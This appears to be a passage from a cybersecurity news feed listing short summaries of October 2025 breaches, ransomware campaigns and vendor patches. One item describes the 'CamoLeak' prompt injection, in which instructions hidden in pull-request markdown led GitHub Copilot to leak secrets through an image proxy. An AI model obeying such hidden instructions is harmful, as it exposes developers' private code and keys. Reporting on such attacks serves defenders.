As part of its October 2025 security updates, Adobe has released patches for more than 35 vulnerabilities across a dozen products. The most severe of these is a critical cross-site scripting (XSS) vulnerability in Adobe Connect, tracked as CVE-2025-49553, which could lead to arbitrary code execution. The flaw holds a CVSS score of 9.3. Other high-severity flaws were addressed in Adobe Commerce and Magento Open Source. Adobe has assigned a lower priority rating to most updates but recommends that users of Commerce and Magento patch promptly due to a historically elevated risk of attack.

Oct 14, 2025 · 4 min read

Massive Botnet of 100k+ IPs Targets U.S. RDP Services

Security researchers at GreyNoise have identified a massive, coordinated botnet campaign targeting Remote Desktop Protocol (RDP) services across the United States. The operation, which began on October 8, 2025, involves over 100,000 unique IP addresses from more than 100 countries. The botnet is using enumeration and timing attacks against RD Web Access and RDP web clients to identify valid user credentials. The widespread and centrally controlled nature of the campaign poses a significant threat to any organization exposing RDP to the internet, as a successful compromise can quickly lead to ransomware deployment or data theft.

Oct 14, 2025 · 5 min read

Qilin Ransomware Hits Japanese Beer Giant Asahi, Steals 27GB of Data

The Russia-based Qilin ransomware group has claimed responsibility for a cyberattack that disrupted operations at Asahi Group Holdings, Japan's largest brewing company. The attack, confirmed by Asahi on October 6, impacted order and shipment systems. On its dark web leak site, the Qilin gang stated it exfiltrated 27 gigabytes of sensitive corporate data, including contracts, financial documents, and employee information. The group has posted samples of the stolen data to pressure Asahi into paying the ransom, highlighting the severe risk ransomware poses to manufacturing and supply chain operations.

Oct 14, 2025 · 4 min read

Living Off the Land: Hackers Abuse Velociraptor DFIR Tool to Deploy Ransomware

A suspected China-based threat group, Storm-2603, is weaponizing the legitimate open-source digital forensics and incident response (DFIR) tool, Velociraptor. According to Cisco Talos, the attackers are using an outdated and vulnerable version of the tool (exploiting CVE-2025-6264) to gain persistence, escalate privileges, and deploy multiple ransomware families, including Warlock, LockBit, and Babuk. The campaign highlights the growing trend of attackers abusing trusted security tools to evade detection while compromising VMware ESXi and Windows environments.

Oct 13, 2025 · 5 min read

Supply Chain Attack Hits Discord: Vendor Breach Exposes 70,000 User IDs

The communication platform Discord has disclosed a significant data breach originating from a third-party customer service vendor, 5CA. The incident, which occurred in early October 2025, resulted in unauthorized access to the sensitive data of approximately 70,000 users who had interacted with Discord's support teams. Exposed information includes photos of government-issued IDs, names, email addresses, IP addresses, and partial billing data. The breach highlights the persistent and growing risk of supply chain attacks, where attackers target less secure partners to access data from larger organizations.

Oct 13, 2025 · 4 min read

Ransomware Groups Pivot to Healthcare Vendors, Attacks Surge 30%

A new report from Comparitech reveals a significant strategic shift in ransomware attacks targeting the healthcare sector. While attacks on direct care providers remained steady, incidents involving healthcare-affiliated businesses and vendors surged by 30% in the first nine months of 2025. Threat actors like Qilin and INC are increasingly targeting less-secure partners such as medical billing services and pharmaceutical manufacturers to disrupt the healthcare supply chain, leading to the breach of over 6 million records from confirmed attacks on these adjacent businesses alone.

Oct 13, 2025 · 4 min read

Russian APT Seashell Blizzard Targets European Critical Infrastructure

A subgroup of the Russian state-sponsored threat actor Sandworm, tracked as Seashell Blizzard, is conducting a new campaign against critical infrastructure in Ukraine and Europe. The attacks leverage phishing emails with malicious XLL attachments to deliver a custom downloader, CheapShot, which in turn deploys a backdoor called ShroudDoor. The campaign targets organizations in the agricultural, defense, transportation, and manufacturing sectors, highlighting ongoing espionage and disruptive efforts by Russian APTs.

Oct 13, 2025 · 4 min read

LastPass Warns of Active Phishing Campaign Impersonating Brand

Password manager LastPass issued an alert on October 13, 2025, about an active phishing campaign targeting its users. The attackers are sending emails from a fraudulent domain with subject lines like "We Have Been Hacked," creating a false sense of urgency to trick users into clicking a malicious link. The link directs victims to a convincing phishing site designed to steal their master password. LastPass has confirmed it was not hacked and is working to take down the malicious infrastructure.

Oct 13, 2025 · 4 min read

New Android Spyware "ClayRat" Spreads via Telegram, Hijacks SMS

A new Android spyware named "ClayRat" is targeting Russian users through fake applications distributed on phishing sites and Telegram. The malware uses sophisticated techniques to bypass Android 13+ security restrictions, install itself as the default SMS handler to intercept 2FA codes, and exfiltrate a wide range of data including call logs and photos. A key feature of ClayRat is its self-propagation mechanism, where it automatically sends malicious links via SMS to all contacts on the victim's device, rapidly expanding the infection.

Oct 13, 2025 · 4 min read

Ivanti Discloses 13 Vulnerabilities in Endpoint Manager, Two High-Severity

Ivanti has released a security advisory for its Endpoint Manager (EPM) software, detailing 13 new vulnerabilities. The batch includes two high-severity flaws—one allowing for local privilege escalation and another for remote code execution with user interaction—and eleven medium-severity bugs, many of which are SQL injection vulnerabilities. While none of the flaws are known to be actively exploited, Ivanti is urging customers to upgrade from the now end-of-life EPM 2022 to the more secure 2024 version and apply forthcoming patches.

Oct 13, 2025 · 4 min read

New York Inflation Refund Program Exploited in Phishing Scams

The New York State Department of Taxation and Finance is warning residents about phishing and smishing (SMS phishing) campaigns that are exploiting a legitimate state inflation relief program. Scammers are sending fraudulent messages claiming that recipients must submit personal and payment information via a malicious link to receive their refund. In reality, the legitimate program sends checks automatically to eligible taxpayers with no action required. The scams use social engineering to create urgency and trick victims into giving up sensitive data.

Oct 13, 2025 · 3 min read

Cl0p Exploits Oracle EBS Zero-Day in Widespread Extortion Campaign, FBI Issues Emergency Warning

A financially motivated threat group, claiming ties to the notorious **[Cl0p](https://attack.mitre.org/groups/G0114/)** ransomware gang, has been exploiting a critical zero-day vulnerability in **[Oracle E-Business Suite](https://www.oracle.com/applications/ebs/)** (EBS). The flaw, **CVE-2025-61882**, is an unauthenticated remote code execution vulnerability with a 9.8 CVSS score. Investigations by Google and Mandiant reveal the attackers exploited the flaw since at least August 2025, months before Oracle released a patch on October 4. The campaign involves exfiltrating large volumes of data and sending extortion emails to executives. The **[FBI](https://www.fbi.gov)** has issued an emergency directive urging immediate patching, highlighting the severe risk to sectors like healthcare and education, with Harvard University confirmed as one of the victims.

Oct 13, 2025 · 6 min read

Oracle Issues Emergency Patch for High-Severity EBS Flaw Amid Active Clop Attacks

Oracle has released an emergency security patch for a high-severity vulnerability, CVE-2025-61884, in its E-Business Suite (EBS). The flaw, which has a CVSS score of 7.5, allows an unauthenticated, remote attacker to access sensitive data within the Oracle Configurator module. It affects EBS versions 12.2.3 through 12.2.14. This alert is especially critical as it comes while the Clop ransomware group is actively exploiting a separate, critical zero-day (CVE-2025-61882) in EBS for an executive extortion campaign. While there's no confirmed link, the active targeting of EBS by Clop significantly increases the risk that this new vulnerability will be weaponized. Administrators are urged to apply the patch immediately.

Oct 12, 2025 · 4 min read

Discord Denies Massive Breach Claim After Hackers Allege 1.5TB Data Leak

Discord is publicly denying claims that it suffered a major data breach. On October 11, 2025, an unknown group of hackers alleged they had exfiltrated and leaked 1.5 terabytes of user data, including highly sensitive government-issued identification documents. Some reports suggested the breach was linked to Discord's Zendesk customer support portal, an allegation Zendesk also refuted, stating its systems were not vulnerable. Discord maintains that its services were not compromised and that the claims are unverified. The significant discrepancy between the hackers' claims and the company's denial leaves the situation unclear, but the mere allegation of leaked IDs poses a serious concern for users.

Oct 12, 2025 · 5 min read

North Korean Hackers Shatter Records, Stealing $2 Billion in Crypto in 2025

North Korean state-sponsored hacking groups have stolen over $2 billion in cryptocurrency assets in 2025 so far, marking the largest annual total ever recorded for the regime. A report highlighted on October 11, 2025, points to the increasing scale and sophistication of these financially motivated cyber operations. The single largest heist of the year was the February 2025 attack on the Bybit cryptocurrency exchange, which accounted for $1.46 billion of the total losses. These attacks on crypto exchanges and DeFi platforms are a critical source of revenue for North Korea, allowing it to circumvent international sanctions and fund its weapons programs.

Oct 12, 2025 · 5 min read

North Korean IT Worker Fraud Scheme Expands, Targeting 5,000 Companies

A sophisticated North Korean scheme using fraudulent IT worker personas to infiltrate companies has expanded into a massive global operation. According to a report from October 11, 2025, researchers have identified over 130 fake identities used in more than 6,500 job interviews with approximately 5,000 companies over a four-year period. These state-sponsored operatives pose as skilled freelance IT workers to secure remote employment, then use their insider access to conduct espionage, steal intellectual property, and divert funds. The campaign, previously thought to be focused on the U.S., is now confirmed to be global, prompting warnings for businesses to enhance their hiring and verification processes for remote workers.

Oct 12, 2025 · 5 min read

Critical RCE Flaw in WooCommerce Designer Pro Plugin Puts WordPress Sites at Risk

A critical vulnerability, CVE-2025-6439, has been disclosed in the WooCommerce Designer Pro WordPress plugin. The flaw, rated 9.8 out of 10 on the CVSS scale, is a path traversal issue that allows an unauthenticated attacker to delete arbitrary files on the web server. This could lead to complete data loss, website destruction, or even remote code execution (RCE) by deleting critical files like wp-config.php and re-running the WordPress installation. The vulnerability affects all versions up to and including 1.9.26 and is also present in the 'Pricom' theme which bundles the plugin. Users are urged to update immediately.

Oct 12, 2025 · 4 min read

WordPress Plugin 'Contest Gallery' Vulnerable to CSV Injection Attacks

A medium-severity CSV injection vulnerability, CVE-2025-11254, has been disclosed in the 'Contest Gallery' plugin for WordPress. The flaw affects all versions up to and including 27.0.3. It allows an unauthenticated attacker to embed malicious formulas into data fields that are later exported as a CSV file by a site administrator. If the administrator opens the malicious CSV file in a spreadsheet program like Microsoft Excel, the formulas can execute, potentially leading to arbitrary code execution on their local machine. The vulnerability has a CVSS score of 4.3 and has been patched in version 28.0.0 of the plugin.

Oct 12, 2025 · 4 min read

Discord Breach Exposes 5.5M Users via Third-Party Vendor Compromise

Discord has officially confirmed a data breach that originated from a compromised third-party customer support vendor, Zendesk. The incident exposed the data of users who had interacted with Discord's support channels. Hackers claim to have exfiltrated information from 5.5 million users, including usernames, email addresses, IP addresses, and the contents of support tickets. Discord has assured its community that sensitive data such as passwords and authentication tokens were not compromised. In response, Discord has revoked the vendor's system access and is in the process of notifying all affected individuals, highlighting the persistent risks associated with third-party supply chain security.

Oct 11, 2025 · 5 min read

175 Malicious NPM Packages Target Developers in Widespread Phishing Attack

A significant software supply chain attack has been identified on the npm open-source repository, where researchers discovered 175 malicious packages that were downloaded approximately 26,000 times. These packages were trojanized to execute credential phishing attacks against developers, aiming to steal logins and API keys. The campaign, which primarily targeted the technology and energy sectors, often used typosquatting techniques to mimic legitimate packages. This incident highlights the critical need for organizations to implement stringent dependency vetting and runtime security monitoring to defend against attacks targeting the software development lifecycle.

Oct 11, 2025 · 5 min read

New 'Chaosbot' Malware Weaponizes Cisco VPN & AD Credentials for Lateral Movement

A new malware strain named "Chaosbot" has been discovered by security researchers. It specializes in using stolen Cisco VPN and Active Directory credentials to execute commands and move laterally within compromised corporate networks. By leveraging legitimate enterprise tools and protocols, this 'living off the land' technique makes the malware's activity difficult to distinguish from normal administrative behavior. Chaosbot represents a significant threat for establishing persistence, escalating privileges, and deploying secondary payloads like ransomware.

Oct 11, 2025 · 5 min read

New 'Stealit' Malware Targets Developers via Malicious Node.js Extensions

A new information-stealing malware named "Stealit" is targeting Windows systems by using malicious Node.js extensions as its infection vector. This novel approach specifically targets software developers, aiming to steal sensitive data such as source code, API keys, and other credentials directly from their development environments. The emergence of Stealit highlights an increasing focus by threat actors on compromising the software supply chain at its source, turning trusted development tools into attack vectors.

Oct 11, 2025 · 5 min read

'MalTerminal' Malware Uses OpenAI's GPT-4 to Auto-Generate Ransomware Code

Researchers have discovered "MalTerminal," a novel malware that uses OpenAI's GPT-4 large language model (LLM) to dynamically generate ransomware code. This represents a significant and dangerous evolution in malware development, enabling the creation of polymorphic code that can evade traditional signature-based detection. The technique dramatically lowers the barrier for less-skilled actors to create sophisticated attacks and poses a major new challenge for cybersecurity defenses, requiring a shift towards behavioral analysis and anomaly detection.

Oct 11, 2025 · 6 min read

Juniper Networks Patches 220 Flaws, Including Nine Critical Bugs Dating Back Years

Juniper Networks has released a massive security update for October 2025, addressing a total of 220 vulnerabilities across its broad portfolio of networking products. The patch bundle includes fixes for nine flaws rated as critical, posing a severe risk of remote code execution or system takeover. Alarmingly, analysis suggests some of these vulnerabilities have existed in products since at least 2019, creating a long window of exposure for potential exploitation. Customers are urged to review the advisories and apply the necessary updates with extreme urgency.

Oct 11, 2025 · 5 min read

Cl0p Ransomware Exploits Oracle E-Business Suite Zero-Day in Mass Attack

The notorious Cl0p ransomware gang is conducting a widespread extortion campaign by exploiting a critical, unauthenticated remote code execution (RCE) zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite. The campaign, active since at least August, involves Cl0p breaching vulnerable systems to steal data and then sending extortion emails to thousands of accounts. Oracle has released an emergency patch for the flaw, which affects versions 12.2.3 through 12.2.14, and is urging customers to update immediately. This attack follows Cl0p's established pattern of leveraging high-impact zero-days in enterprise software for mass compromise.

Oct 10, 2025 · 5 min read

GitHub Patches 'CamoLeak' Flaw in Copilot That Allowed Silent Code and Secret Exfiltration

A critical vulnerability, dubbed 'CamoLeak,' has been discovered and patched in **[GitHub Copilot Chat](https://github.com/features/copilot)**. The flaw, rated 9.6 CVSS by researcher Omer Mayraz of Legit Security, allowed attackers to silently steal private source code, API keys, and other secrets from developers' repositories. The attack involved a novel prompt injection technique where malicious instructions were hidden in a pull request's markdown. When a developer used Copilot to review the PR, the AI would execute the hidden commands. The stolen data was then exfiltrated character-by-character using a clever trick involving **[GitHub](https://github.com/)**'s own image proxy service, Camo, bypassing standard security controls. GitHub has mitigated the flaw by disabling image rendering in Copilot Chat.

Oct 10, 2025 · 5 min read

Crypto Platform Shuffle.com Discloses Major Data Breach via Third-Party CRM Provider

Crypto betting platform **[Shuffle.com](https://shuffle.com/)** has confirmed a significant data breach affecting a majority of its users. The incident occurred not on Shuffle's own systems, but at its third-party CRM provider, **Fast Track**. On October 10, Shuffle announced that attackers compromised Fast Track and gained access to a trove of sensitive user data. The exposed information includes full names, emails, phone numbers, home addresses, transaction histories, and, most critically, Know Your Customer (KYC) identity documents like passports and driver's licenses. While user funds and passwords are safe, the breach creates a severe risk of identity theft and targeted phishing for affected customers. Shuffle has revoked the provider's access and is urging users to enable 2FA.

Oct 10, 2025 · 5 min read

New 'White Lock' Ransomware Emerges, Demanding 4 Bitcoin and Threatening Data Leaks

A new ransomware strain named **White Lock** has been identified by cybersecurity researchers. Operating as a double-extortion threat, the malware first exfiltrates sensitive data before encrypting files on the victim's Windows system, appending the `.fbin` extension. A ransom note, `c0ntact.txt`, is dropped in each affected folder, demanding a payment of 4 Bitcoin within a stringent four-day deadline. The operators threaten to notify the victim's customers, sell the stolen data to competitors, and ultimately leak it publicly if the ransom is not paid. Victims are instructed to use the **[Tor](https://www.torproject.org/)** browser to communicate with the attackers, suggesting a focus on high-value enterprise targets.

Oct 10, 2025 · 5 min read

Humiliation for Pro-Russian Hackers 'TwoNet' After Attacking Decoy Water Utility Honeypot

The pro-Russian hacktivist group **TwoNet** has been publicly embarrassed after cybersecurity firm **[Forescout](https://www.forescout.com/)** revealed the group was duped into attacking a sophisticated decoy system. In September, TwoNet boasted on Telegram about disrupting a Dutch water utility's control systems. However, Forescout's research, published on October 10, confirmed the 'attack' was against one of their industrial control system (ICS) honeypots. The attacker, 'Barlati,' gained access using default credentials (`admin`/`admin`), defaced the HMI, and changed settings, believing it was a real facility. The incident highlights the naivety of some hacktivist groups and provides valuable intelligence on their TTPs against critical infrastructure.

Oct 10, 2025 · 5 min read

New Chinese APT 'Phantom Taurus' Targets Global Geopolitical Intel with 'NET-STAR' Malware

A newly designated, sophisticated threat group aligned with China, named **Phantom Taurus**, has been identified conducting long-term cyber-espionage campaigns. Active for over two years, the group targets government, military, and telecommunications organizations across Africa, the Middle East, and Asia. Its operations focus on strategic intelligence gathering that aligns with China's geopolitical interests. **Phantom Taurus** is distinguished by its stealth and use of a custom malware suite called **NET-STAR**, which targets **[Microsoft Internet Information Services (IIS)](https://www.iis.net/)** servers. While showing some infrastructure overlap with known APTs like **[APT27](https://attack.mitre.org/groups/G0045/)** and **[Mustang Panda](https://attack.mitre.org/groups/G0129/)**, its unique tools and TTPs mark it as a distinct and advanced threat.

Oct 10, 2025 · 6 min read

Killsec Ransomware Claims Attack on Indonesian FinTech WalletKu, Threatens to Leak KYC Data

The **Killsec** ransomware group has claimed responsibility for an attack on **WalletKu Indompet Indonesia**, a financial technology firm based in Jakarta. WalletKu provides a digital payment application primarily for micro, small, and medium enterprises. According to a post on an underground forum, Killsec has compromised the company and is threatening to release a significant amount of sensitive customer data. The exposed data reportedly includes Know Your Customer (KYC) information, such as full names, photos, government-issued IDs, and addresses. The attack highlights the growing trend of ransomware groups targeting FinTech companies, where the theft of KYC data poses a severe risk of identity theft and fraud for customers.

Oct 10, 2025 · 5 min read

'Datzbro' Android Trojan Targets Seniors in Global AI-Powered Facebook Scam

A global malicious campaign is using AI-generated content to create fake **[Facebook](https://www.facebook.com/)** groups that target seniors. The campaign, detailed in a CYFIRMA report, sets up convincing-looking communities for social events to lure victims into downloading a malicious Android application. This app is a potent banking trojan and spyware known as **Datzbro**. The malware can grant attackers full remote control of the device, enabling them to record audio and video, steal files, and use phishing overlays to capture banking credentials. The campaign has been observed targeting users in Australia, Canada, the UK, and Southeast Asia. The threat is amplified by the fact that the builder for the Datzbro trojan was previously leaked online, allowing any criminal to use it.

Oct 10, 2025 · 5 min read

Perfect 10.0 CVSS Flaw in GoAnywhere MFT Exploited by Medusa Ransomware Group

Microsoft has linked the cybercrime group Storm-1175, known for deploying Medusa ransomware, to the active exploitation of a critical vulnerability in Fortra's GoAnywhere Managed File Transfer (MFT) solution. The flaw, CVE-2025-10035, is an unauthenticated remote code execution vulnerability with a perfect 10.0 CVSS score. Storm-1175 has been exploiting this zero-day since at least September 11, 2025, to compromise organizations in finance, healthcare, and technology, deploying backdoors and RMM tools before exfiltrating data and deploying ransomware.

Oct 9, 2025 · 5 min read

Phishing Campaign Lures Marketing Professionals with Fake Jobs at Tesla, Google

Security firm Cofense has detailed a sophisticated phishing campaign that targets marketing and social media professionals with fake job opportunities from high-profile brands like Tesla, Google, Ferrari, and Red Bull. The campaign uses realistic emails and multi-step credential harvesting portals to trick victims. Unlike typical phishing attacks, the primary goal is to collect detailed resumes and other personally identifiable information (PII). This data can then be used by threat actors to craft more convincing social engineering attacks, bypass security questions, or commit identity theft.

Oct 9, 2025 · 4 min read

Financial Firms Tie CEO Pay to Cyber Performance Amid Budget Hikes, Moody's Finds

A new report from Moody's indicates a significant shift in how financial and insurance firms are managing cyber risk. Companies are increasing cybersecurity spending, with nearly half dedicating 8% or more of their IT budget to cyber. Governance is also strengthening, as 40% of firms now link CEO compensation directly to cybersecurity performance, up from 24% in 2023. Furthermore, CISO briefings to the board are becoming more frequent, and firms are maturing their operational readiness with annual incident response tests and daily data backups.

Oct 9, 2025 · 3 min read

Expert Advice on Securing Critical Infrastructure with Limited Budgets

In a recent podcast, cybersecurity expert Chetrice Romero from Ice Miller provided guidance for leaders responsible for protecting critical infrastructure, particularly those facing limited budgets. The discussion covered common cyber and physical threats to utilities, the need for scalable and resilient strategies, and practical advice for maximizing security investments. Key recommendations included embracing cloud-native platforms for efficiency and designing future-proof command centers, offering actionable insights for securing essential systems in a challenging economic environment.

Oct 9, 2025 · 3 min read

Clop Exploits Critical Oracle Zero-Day; CISA Issues Emergency Patch Directive

Multiple international cybersecurity agencies, including CISA, the UK's NCSC, and Singapore's CSA, have issued urgent warnings about a critical zero-day vulnerability, CVE-2025-61882, in Oracle E-Business Suite. The flaw, which has a CVSS score of 9.8, is being actively exploited by the Clop ransomware group in a campaign that began in August 2025. The attackers are leveraging the vulnerability to exfiltrate corporate data and are now sending extortion emails to executives of victim organizations. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by October 28, 2025, highlighting the extreme risk posed by this unauthenticated remote code execution flaw.

Oct 8, 2025 · 5 min read

Qilin Ransomware Claims Disruptive Attack on Japanese Beverage Giant Asahi

The Russia-based Qilin ransomware group has claimed responsibility for a significant cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, first disclosed in late September 2025, caused major operational disruptions, forcing the suspension of order and shipment systems. On October 7, Qilin added Asahi to its data leak site, alleging the theft of 27 gigabytes of sensitive data, including contracts and employee information. Asahi is still working to restore its systems, highlighting the vulnerability of manufacturing and supply chain operations to ransomware.

Oct 8, 2025 (4 min read)

Microsoft Warns of Attackers Abusing Teams for Session Hijacking

Microsoft has issued a warning about a threat actor group, tracked as Storm-2372, that is abusing legitimate Microsoft Teams features for cyberattacks. In a report on October 7, 2025, Microsoft detailed how the group uses social engineering within Teams chats and file sharing to deliver malware, trick users into fraudulent authentication flows, and ultimately steal access tokens to hijack user sessions. The attacks are effective because they originate from within the trusted Teams environment, making users more likely to fall for the lures.

Oct 8, 2025 (4 min read)

Red Hat Consulting GitLab Breached; ShinyHunters Leaks Sensitive Client Data

Red Hat has confirmed a security breach affecting an internal GitLab server used by its consulting division. A group named 'Crimson Collective,' in collaboration with the notorious extortion group 'ShinyHunters,' claims to have stolen 570GB of data from over 28,000 repositories. The stolen data allegedly includes highly sensitive 'Customer Engagement Reports' containing network diagrams, configurations, and access details for over 800 organizations, including Bank of America, Verizon, and the U.S. National Security Agency. While Red Hat states the breach was contained and did not impact its product supply chain, the incident represents a massive supply chain risk for its clients.

Oct 8, 2025 (5 min read)

Methodist Homes Discloses Healthcare Data Breach Affecting Nearly 26,000

Methodist Homes of Alabama & Northwest Florida, a senior living and healthcare provider, announced on October 8, 2025, that it suffered a data breach affecting 25,579 individuals. The incident, which occurred over a 12-day period in October 2024, resulted in unauthorized access to sensitive personal and protected health information (PHI). The compromised data includes names, Social Security numbers, driver's license numbers, and detailed clinical information. The organization's disclosure comes nearly a year after the initial detection of the breach.

Oct 8, 2025 (4 min read)

Critical RCE Flaw (CVE-2025-53967) Patched in Figma AI Tool

A high-severity command injection vulnerability, CVE-2025-53967, has been discovered and patched in the 'figma-developer-mcp' Model Context Protocol server, a tool used with the Figma design platform. The flaw, rated with a CVSS score of 7.5, could allow an unauthenticated attacker to achieve remote code execution (RCE) on a server running the tool. The vulnerability, discovered by Imperva, stemmed from the unsanitized use of user input in command-line strings. Users are urged to update to the patched version to mitigate the risk of server compromise.

Oct 8, 2025 (4 min read)

Google Rolls Out October 2025 Security Update for Pixel Devices

Google has released its scheduled October 2025 security update for all supported Pixel devices. The update, detailed in the Pixel Update Bulletin on October 8, 2025, addresses numerous security vulnerabilities. It incorporates all patches from the broader October 2025 Android Security Bulletin, along with additional fixes for flaws specific to Pixel hardware components. Google urges all Pixel users to accept the over-the-air (OTA) update to protect their devices from potential exploitation.

Oct 8, 2025 (3 min read)

Atos Partners with Qevlar AI to Deploy "Virtual SOC Analyst"

On October 7, 2025, the global digital transformation and cybersecurity firm Atos announced a strategic partnership with Qevlar AI. The collaboration will integrate Qevlar's 'Virtual SOC Analyst,' an agentic AI technology, into Atos's global network of 17 Security Operations Centers (SOCs). The goal is to automate routine and intermediate security alert investigations, allowing Atos's human analysts to focus on more complex tasks like proactive threat hunting. The partnership aims to enhance operational efficiency for Atos's 2,000+ managed security customers.

Oct 8, 2025 (3 min read)

SonicWall Breach Escalates: 100% of Cloud Backups Confirmed Stolen

Firewall vendor SonicWall has dramatically escalated the severity of a recent data breach, confirming that an investigation found that 100% of customers using its cloud backup service had their firewall configuration files stolen. This admission, made on October 6, 2025, after an investigation with Mandiant, starkly contrasts with the company's initial September statement that only 5% of its user base was affected. The stolen files, accessed via the MySonicWall portal, contain sensitive network architecture details and encrypted credentials, posing a significant reconnaissance risk for future attacks against all affected customers.

Oct 8, 2025 (5 min read)

New 'Scattered Lapsus$ Hunters' Gang Extorts 39 Salesforce Customers on Leak Site

A new cybercriminal collective calling itself 'Scattered Lapsus$ Hunters' has emerged, claiming to be a merger of members from Scattered Spider, Lapsus$, and ShinyHunters. The group launched a dark web data leak site over the weekend of October 4-5, listing 39 major companies, including Cisco, Toyota, and Marriott, as victims of a massive data breach affecting their Salesforce instances. The actors claim to have exfiltrated nearly one billion records and have set an October 10 deadline for ransoms to be paid. In an unusual tactic, they have also demanded that Salesforce pay a ransom to spare the listed victims, threatening to release documents proving alleged security negligence. The breaches are suspected to have originated from vishing attacks targeting IT help desks.

Oct 8, 2025 (5 min read)

CISA Adds Actively Exploited Zimbra XSS Zero-Day (CVE-2025-27915) to KEV Catalog

On October 7, 2025, CISA added CVE-2025-27915, a high-severity zero-day vulnerability in the Zimbra Collaboration Suite (ZCS), to its Known Exploited Vulnerabilities (KEV) catalog. The flaw is a stored cross-site scripting (XSS) issue in the ZCS Classic Web Client that can be triggered with no user interaction beyond viewing a malicious email. An attacker can craft a malicious iCalendar invitation that, when processed, executes arbitrary JavaScript in the victim's authenticated session. This allows for account takeover, data exfiltration, and redirection of sensitive emails. Federal agencies are mandated to apply mitigations by October 28, 2025.

Oct 8, 2025 (4 min read)

Signal Threatens to Exit EU Market if "Chat Control" Mass Surveillance Bill Passes

Meredith Whittaker, the president of the Signal Foundation, has declared that the encrypted messaging service will withdraw from the European Union if the controversial 'Chat Control' legislation is enacted. The proposed law, which faces a critical vote on October 14, would mandate that communication platforms like Signal and WhatsApp scan all user content, including private messages and photos, for illicit material before it is encrypted. Critics, including Signal, argue this would create a backdoor for mass surveillance, fundamentally break end-to-end encryption, and create a dangerous cybersecurity precedent. The statement is a direct appeal to EU member states, particularly Germany, to vote against the measure.

Oct 7, 2025 (4 min read)

CISA Warns of Actively Exploited Windows Privilege Escalation Flaw (CVE-2021-43226)

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2021-43226, a high-severity privilege escalation vulnerability in the Microsoft Windows Common Log File System (CLFS) Driver, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on October 6, 2025, confirms the flaw is being actively exploited in the wild. The vulnerability allows a local, authenticated attacker to execute code with SYSTEM-level privileges by leveraging a buffer overflow. The flaw affects a wide range of Windows versions, including Windows 10, 11, and Server editions. Federal agencies have been directed to patch the vulnerability by October 27, 2025.

Oct 7, 2025 (4 min read)

Jaguar Land Rover Begins Phased Restart a Month After Crippling Cyberattack

On October 7, 2025, Jaguar Land Rover (JLR) announced it is beginning a phased restart of its manufacturing plants, more than a month after a major cyberattack on August 31 halted its global operations. The attack disrupted everything from production lines and parts flow to retail systems. The restart is beginning cautiously, with engine plants and stamping operations coming online first, and full production is hoped for by the end of October. The incident has caused a significant financial blow, with sales dropping sharply in all markets. In response to the crisis, JLR has also launched a new financing program to support its struggling suppliers who have lost weeks of orders.

Oct 7, 2025 (5 min read)

AI Risk Disclosures Skyrocket Among S&P 500, Cybersecurity a Top Concern

A new report from The Conference Board, released on October 7, 2025, reveals a dramatic shift in corporate risk perception, with over 70% of S&P 500 companies now formally disclosing AI-related risks in their public filings. This is a massive jump from just 12% in 2023. Reputational damage is the most cited concern (38%), followed closely by cybersecurity risks (20%). Companies are increasingly worried about how AI expands the attack surface, introduces new vulnerabilities through third-party tools, and creates new legal and regulatory challenges. The findings highlight that while AI adoption is accelerating, corporate governance and oversight are still struggling to keep pace.

Oct 7, 2025 (4 min read)

Redis Patches Critical "RediShell" RCE Flaw (CVE-2025-49844) in Lua Sandbox

Redis has released patches for CVE-2025-49844, a critical use-after-free vulnerability nicknamed "RediShell" by the Wiz researchers who discovered it. The flaw, announced on October 7, 2025, allows an authenticated attacker to escape the Lua sandbox and achieve remote code execution (RCE) on the underlying server. The risk is especially high for the estimated 330,000 internet-exposed Redis instances, around 60,000 of which are believed to have no authentication enabled. Because official Redis container images disable authentication by default, these instances are vulnerable to unauthenticated RCE. Security agencies like Germany's BSI are warning of imminent exploitation.

Oct 7, 2025 (5 min read)

Digicloud Africa to Distribute Google's AI-Powered SecOps Platform Across Continent

Digicloud Africa, a major Google Cloud distributor, announced on October 6, 2025, that it has partnered with Google Security Operations. This collaboration will make Google's advanced, AI-driven cybersecurity solutions, including its cloud-native SIEM and SOAR platform, available to enterprises and organizations across the African continent. The partnership aims to help African businesses modernize their security posture, moving from reactive to proactive, intelligence-driven defense strategies to combat the growing complexity of cyber threats in the region.

Oct 7, 2025 (3 min read)

CISA Warns of Widespread Flaws in Industrial Control Systems from Major Vendors

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a series of advisories warning of numerous vulnerabilities in Industrial Control Systems (ICS) from prominent vendors, including Rockwell Automation, Hitachi Energy, Mitsubishi Electric, and Delta Electronics. These flaws affect products widely deployed in the energy sector and other critical infrastructure domains. CISA is urging administrators to review the advisories and apply patches and mitigations immediately to prevent potential exploitation that could lead to operational disruptions or cyberattacks against critical national infrastructure.

Oct 6, 2025 (4 min read)

Microsoft Patches 3 Zero-Days Under Active Attack in Massive October Update

Microsoft has released its October 2025 Patch Tuesday update, a colossal release addressing 175 security flaws across its product suite. The update is highlighted by emergency patches for three zero-day vulnerabilities confirmed to be actively exploited in the wild. These critical flaws, now added to CISA's KEV catalog, include two privilege escalation bugs in Windows components (CVE-2025-59230 and CVE-2025-24990) and a Secure Boot bypass (CVE-2025-47827). The update also fixes a critical 9.8 CVSS RCE vulnerability in WSUS (CVE-2025-59287), posing a significant supply-chain risk. Administrators are urged to apply these updates immediately to mitigate active threats.

Oct 6, 2025 (5 min read)

Chinese APT Flax Typhoon Weaponizes ArcGIS Server as Persistent Backdoor in Year-Long Spy Campaign

The China-linked threat group Flax Typhoon (also known as Ethereal Panda) conducted a sophisticated, year-long espionage campaign against a government agency by compromising an Esri ArcGIS server. According to researchers at ReliaQuest, the attackers modified a legitimate Java server object extension (SOE) to create a persistent web shell. This backdoor, combined with extensive use of living-off-the-land techniques like PowerShell and a renamed SoftEther VPN client, allowed the APT group to maintain long-term access, move laterally, and harvest credentials while evading detection by hiding within legitimate server traffic.

Oct 6, 2025 (5 min read)

Qilin Ransomware Cripples Asahi Breweries, Demands $10 Million Ransom

